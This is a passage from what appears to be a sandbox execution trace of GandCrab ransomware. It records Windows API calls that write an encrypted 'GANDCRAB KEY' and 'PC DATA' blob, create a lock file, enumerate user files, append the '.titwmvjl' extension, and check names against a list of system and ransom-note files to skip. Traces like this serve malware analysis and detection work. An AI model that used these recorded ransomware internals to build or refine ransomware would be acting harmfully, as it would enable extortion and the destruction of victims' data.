x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0093.702] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0093.703] CloseHandle (hObject=0x230) returned 1 [0093.703] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.703] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.704] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x27, wMilliseconds=0x15)) [0093.704] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.704] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.704] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.704] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\d2ca4a09d2ca4deb61a.lock") returned 54 [0093.704] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\nethood\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0093.705] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.705] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.705] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\") returned 30 [0093.705] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\*" [0093.705] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0093.705] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\NetHood\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0093.705] CloseHandle (hObject=0x230) returned 1 [0093.706] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0093.706] lstrcmpW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0093.706] lstrcmpW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0093.706] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="NTUSER.DAT" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT") returned="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT" [0093.706] lstrlenW (lpString=".titwmvjl") returned 9 [0093.706] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT") returned 32 [0093.706] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.706] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT.titwmvjl") returned 41 [0093.706] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT") returned 32 [0093.706] lstrlenW (lpString=".DAT") returned 4 [0093.706] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.706] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".DAT ") returned 5 [0093.706] lstrcmpiW (lpString1=".DAT", lpString2=".titwmvjl") returned -1 [0093.706] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.707] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT") returned 32 [0093.707] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT") returned 32 [0093.707] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="desktop.ini") returned 1 [0093.707] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="autorun.inf") returned 1 [0093.707] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ntuser.dat") returned 0 [0093.707] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.707] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0093.707] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2=".") returned 1 [0093.707] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2="..") returned 1 [0093.707] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="ntuser.dat.LOG1" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1") returned="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1" [0093.707] lstrlenW (lpString=".titwmvjl") returned 9 [0093.707] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1") returned 37 [0093.707] VirtualAlloc (lpAddress=0x0, dwSize=0x8a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.707] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1.titwmvjl") returned 46 [0093.707] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1") returned 37 [0093.707] lstrlenW (lpString=".LOG1") returned 5 [0093.707] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.708] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".LOG1 ") returned 6 [0093.708] lstrcmpiW (lpString1=".LOG1", lpString2=".titwmvjl") returned -1 [0093.708] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.708] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1") returned 37 [0093.708] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1") returned 37 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="desktop.ini") returned 1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="autorun.inf") returned 1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="ntuser.dat") returned 1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="iconcache.db") returned 1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="bootsect.bak") returned 1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="boot.ini") returned 1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="ntuser.dat.log") returned 1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="thumbs.db") returned -1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="KRAB-DECRYPT.html") returned 1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="CRAB-DECRYPT.html") returned 1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="ntldr") returned 1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="NTDETECT.COM") returned 1 [0093.708] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="Bootfont.bin") returned 1 [0093.708] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1") returned 37 [0093.708] lstrlenW (lpString=".LOG1") returned 5 [0093.708] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.709] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".LOG1 ") returned 6 [0093.709] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.709] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.709] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0093.709] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.709] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.710] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0093.710] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2=".") returned 1 [0093.710] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2="..") returned 1 [0093.710] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="ntuser.dat.LOG2" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2") returned="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2" [0093.710] lstrlenW (lpString=".titwmvjl") returned 9 [0093.710] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2") returned 37 [0093.710] VirtualAlloc (lpAddress=0x0, dwSize=0x8a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.710] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2.titwmvjl") returned 46 [0093.710] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2") returned 37 [0093.710] lstrlenW (lpString=".LOG2") returned 5 [0093.710] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.710] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".LOG2 ") returned 6 [0093.710] lstrcmpiW (lpString1=".LOG2", 